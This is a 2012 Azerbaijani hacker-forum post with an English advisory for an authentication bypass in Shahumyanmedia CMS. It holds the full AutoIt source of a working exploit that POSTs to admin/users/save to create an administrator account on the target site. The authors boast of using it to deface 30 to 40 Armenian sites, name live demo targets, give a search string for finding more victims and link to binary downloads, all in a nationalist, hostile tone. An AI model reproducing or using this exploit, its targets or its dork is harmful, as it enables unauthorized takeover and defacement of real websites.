Istifadəçi |
2012-07-23 01:04 GMT |
|
|
|
Pr0grammer |
|
Mesaj Sayı : 1677 |
Mövzu Sayı : |
Rep Ver : |
Rep Sayı : 62 |
Indi Saytda : |
Cinsiyyət : Oğlan |
|
Şəhər : KARABAKH IS AZERBAIJAN! |
Ölkə : |
Məslək : |
Yaş : |
Mesaj : |
|
Qısacası BOT_25 ilə xaçiklərin özləri kimi girdirmə cms sistemlərində tapdığımız+exploit etdiyimiz+nəticədə 30-40 xaçik saytını xoşbəxt elədiyimiz
Authentication Bypass tipli vuln üçün 0day advisorymiz.
Exploit bəzi pclərdə işləməyə bilər advisory-də də yazmışam bu barədə mənlik deyil problem Autoit-in winhttp adlı UDF-indəki mənə məlum olmayan bug-ıdır səbəb.
Çox ehtimalki xüsusilə LAN tipli şəbəkədə adres translyasiyası səhv verir.
PPoE-də isə bu tipli translyasiya başqa cürədir məhz o səbəbdən işləkdir PPoE-də vasitəsilə qurulmuş connectionda.
Enjooyyyyyyyyyyyy)
Kod: ========================================================
Vulnerable Software: Shahumyanmedia CMS © 2010 Shahumyan Media
Official site: http://shahumyanmedia.com/
========================================================
First we want to say: it is not so widely used cms.Only .am (30-40) sites uses it.
This cms also is commercial.
This cms is prone to Authentication Bypass vulnerability and we used it to deface this .am sites.(BTW, nice 0day xD)
But now we are going to 0day it and we will disclosure exploit for it which is written by us too as we promice to @itsec guy. ha ha ha))))))
The exploit is written in AutoIT programming/scripting language.
*In some cases it may not work for you even target site vulnerable*
This isn't our fault.It is due UDF called winhttp component a bit buggie) But it is really nice UDF.
Anyways, if you want successfull exploitation use PPoE connection and it will work for you.
You can find binary of exploit (32 bit and 64 bit) in archive + source code of exploit also included.
On successfull exploitation it will add new administrative account to target site.
We will also disclosure "Demo" sites to reproduce exploitation.
ENjoy)
/AkaStep & BOT_25
========================================================
Source code of Exploit:
NOTE: Exploit was tested on Win XP SP2 machine against real sites.
Works for me like charm.
Print screen 1: http://s017.radikal.ru/i434/1207/44/a3737fb99fab.png
Print Screen 2: http://s56.radikal.ru/i151/1207/db/6916d93618a3.png
=====================BEGIN==============================
#NoTrayIcon
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Version=beta
#AutoIt3Wrapper_Icon=best.ico
#AutoIt3Wrapper_Outfile=shpoc32.exe
#AutoIt3Wrapper_Outfile_x64=shpoc64.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Compile_Both=y
#AutoIt3Wrapper_UseX64=y
#AutoIt3Wrapper_Res_Comment=AkaStep & BOT_25
#AutoIt3Wrapper_Res_Description=AkaStep & BOT_25
#AutoIt3Wrapper_Res_Fileversion=3.1.6.1
#AutoIt3Wrapper_Res_LegalCopyright=AkaStep & BOT_25
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <GuiStatusBar.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
#include "WinHttp.au3"
#include <String.au3>
#cs
This Is a Private Exploit against shahumyanmedia cms.
But for now after a lot of defacement of .am sites we think we can disclosure it.
On success exploiting it will add new administrator to target site.
Vuln type: Authentication Bypass.
VUln anD Exploit Discovered By *AkaStep & BOT_25*
Shoutz to All Azerbaijan Black Hatz!
*Azerbaycana + Turk Qardaslarimiza Atesli Salamlar!*
23 July 2012
Demo 1: www.eurovision.am
Demo 2: safecity.am
And Google for "© 2010 Shahumyan Media"
admin page: eurovision.am/admin/
#ce
$Form1 = GUICreate("shahumyanmedia cms Auth Bypass Exploit", 414, 292, -1, -1)
GUISetBkColor(0x000000)
$Input1 = GUICtrlCreateInput("0dayforyou", 184, 136, 137, 21)
GUICtrlSetLimit(-1,30)
$Input2 = GUICtrlCreateInput("0dayforyou", 184, 176, 137, 21)
GUICtrlSetLimit(-1,30)
$Label1 = GUICtrlCreateLabel("Username", 80, 136, 76, 25, $SS_CENTER)
GUICtrlSetFont(-1, 10, 400, 0, "MS Sans Serif")
GUICtrlSetColor(-1, 0xFF0000)
$Label2 = GUICtrlCreateLabel("Password", 80, 176, 74, 25, $SS_CENTER)
GUICtrlSetFont(-1, 10, 400, 0, "MS Sans Serif")
GUICtrlSetColor(-1, 0xFF0000)
$Exploit = GUICtrlCreateButton("Exploit", 24, 224, 153, 25)
$Label3 = GUICtrlCreateLabel("Target Site", 80, 96, 88, 17)
GUICtrlSetFont(-1, 10, 400, 0, "MS Sans Serif")
GUICtrlSetColor(-1, 0xFF0000)
$Input3 = GUICtrlCreateInput("site.tld", 184, 96, 137, 21)
GUICtrlSetLimit(-1,30)
$About = GUICtrlCreateButton("About", 224, 224, 177, 25)
$StatusBar1 = _GUICtrlStatusBar_Create($Form1)
_GUICtrlStatusBar_SetMinHeight($StatusBar1, 25)
_GUICtrlStatusBar_SetText($StatusBar1,'Idle...')
$Label4 = GUICtrlCreateLabel("0day From Azerbaijan Black Hatz", 24, 24, 362, 36, $SS_CENTER)
GUICtrlSetFont(-1, 14, 400, 0, "MS Sans Serif")
GUICtrlSetColor(-1, 0xFF0000)
$Group1 = GUICtrlCreateGroup("", 8, 8, 401, 201)
GUICtrlCreateGroup("", -99, -99, 1, 1)
GUISetState(@SW_SHOW)
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
$uzanmusdunda_niye_bele_tez_gedirsen=MsgBox(262209,"","Exit?")
if $uzanmusdunda_niye_bele_tez_gedirsen=1 Then
MsgBox(262208,"","Ok...Byee)",10)
Exit
EndIf
Case $Exploit
GUICtrlSetState($Exploit,$GUI_DISABLE)
$askforuniquename=MsgBox(262209,"","Before Proceeding make Sure you are using Unique" & @CRLF & "and Not Existent User name on target site" & @CRLF & _
"Otherwise Exploit may fail for you" & @CRLF & _
"Are you Ready?")
If $askforuniquename=1 Then
_GUICtrlStatusBar_SetText($StatusBar1,'Working... Please Wait...')
Sleep(Random(1000,1800,1)); # Some random sleep.
$targetsite=GUICtrlRead($Input3)
$adduser=GUICtrlRead($Input1)
$addpass=GUICtrlRead($Input2)
blackexploit($targetsite,$adduser,$addpass); passing it to function.
Else
GUICtrlSetState($Exploit,$GUI_ENABLE)
EndIf
Case $About
GUICtrlSetState($About,$GUI_DISABLE)
$creditstoAzerbaijan_blackhatz="This exploit Coded By AkaStep." & @CRLF & _
"The vulnerability Discovered By BOT_25~AkaStep" & @CRLF & "Hope You Will Enjoy while Using It) Meh Meh))))" & @CRLF & "Also Special Respect to My Bro CAMO." & @CRLF & ' WwW.ANTI-armenia.ORG '
MsgBox(262208,"",$creditstoAzerbaijan_blackhatz);
GUICtrlSetState($About,$GUI_ENABLE)
EndSwitch
WEnd
Func blackexploit($targetsite,$adduser,$addpass)
_GUICtrlStatusBar_SetText($StatusBar1,'Opening Connection to Target Site... Please Wait...')
Sleep(Random(1000,1800,1)); # Some random sleep.
#cs
Begin Send Data
#ce
$triggerforsuccess='{"result":1,"message":""}'
$bad1='http://'
$bad2='/'
$targetsite=StringReplace(StringReplace($targetsite,$bad1,''),'/','');# Some CLeanup #
Global $sAddress = $targetsite
$rndstr=Random(156788111,54614128,1) & '@pipi.tld'; xD
$rndmail=$rndstr
;~ Payload to add administrative user. ;~ #
Global $sPostData = "username=" & $adduser & "&password=" &$addpass & "&email=" & $rndmail &"&user_type_id=1&firstname_en=" & $adduser & "&lastname_en=" & $adduser & "&secondname_en=" & $adduser & "&firstname_am=&lastname_am=&secondname_am=&firstname_ru=&lastname_ru=&secondname_ru=&user_id=0&x-technology=ajax"
Global $hOpen = _WinHttpOpen("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4) Gecko/20120122 Netscape6/6.2")
Global $hConnect = _WinHttpConnect($hOpen, $sAddress)
Global $hRequest = _WinHttpOpenRequest($hConnect, _
"POST", _
"admin/users/save", _
Default, _
Default, _
"application/json, text/javascript, */*")
_WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-us,en;q=0.5")
_WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
_WinHttpAddRequestHeaders($hRequest, "DNT: 1")
_WinHttpAddRequestHeaders($hRequest, "Keep-Alive: 300")
_WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
_WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded; charset=UTF-8")
_WinHttpAddRequestHeaders($hRequest, "X-Requested-With: XMLHttpRequest")
_WinHttpSendRequest($hRequest, -1, $sPostData)
_WinHttpReceiveResponse($hRequest)
Global $sHeader, $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
$sHeader = _WinHttpQueryHeaders($hRequest)
Do
$sReturned &= _WinHttpReadData($hRequest)
Until @error
;success or fail
if StringInStr($sReturned,$triggerforsuccess) Then
GUICtrlSetState($Exploit,$GUI_ENABLE)
$tolog="Target Site is Vulnerable and exploiting of Vulnerability was Successfull!" & @CRLF & _
_StringRepeat('-',30) & @CRLF & _
'Login Page: ' & $targetsite & '/admin/' & @CRLF & _
'Your Administrative User: ' & $adduser & @CRLF & _
'PassWord: ' & $addpass & @CRLF & _
_StringRepeat('-',30) & @CRLF & 'Enjoy:)'
_GUICtrlStatusBar_SetText($StatusBar1,'Exploit Was Successfull!')
Sleep(300);
FileWrite(@ScriptDir & "\exploitlog.txt",@CRLF & $tolog & @CRLF)
MsgBox(262208,"Exploited!", $tolog)
_GUICtrlStatusBar_SetText($StatusBar1,'Idle...')
Else
GUICtrlSetState($Exploit,$GUI_ENABLE)
_GUICtrlStatusBar_SetText($StatusBar1,'Exploit Failed...')
MsgBox(262192,"Exploit Failed:(","Seems Target Site is not vulnerable...");
_GUICtrlStatusBar_SetText($StatusBar1,'Idle...')
EndIf
Else
_GUICtrlStatusBar_SetText($StatusBar1,'WTF?')
MsgBox(262192, "Error!", "No internet Connection or Incorrect Domain Name?.")
_GUICtrlStatusBar_SetText($StatusBar1,'')
GUICtrlSetState($Exploit,$GUI_ENABLE)
EndIf
_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)
#cs
End SEND DATA
#ce
EndFunc; => blackexploit()
=====================END OF============================
Binary && src you will find in attachment named: 0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip
MD5 SUM:
=======================================================
$ md5sum 0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip
4cb562fc1fa839e50ea8b6462967ea01 *0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip
=======================================================
http://www.boxca.com/yqwn8h4mhub0/0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip.html
********************* AZERBAIJAN BLACK HATZ***********************************
Of course we never forget our friends so, A BIG RESPECTS+THANKS TO ALL:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
===========================================================
Thanks & Respect!
/AkaStep & BOT_25 e]
http://pastebin.com/CvSTw3Xa
http://www.boxca.com/yqwn8h4mhub0/0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip.html
|
Anti-armenia.ORG |
|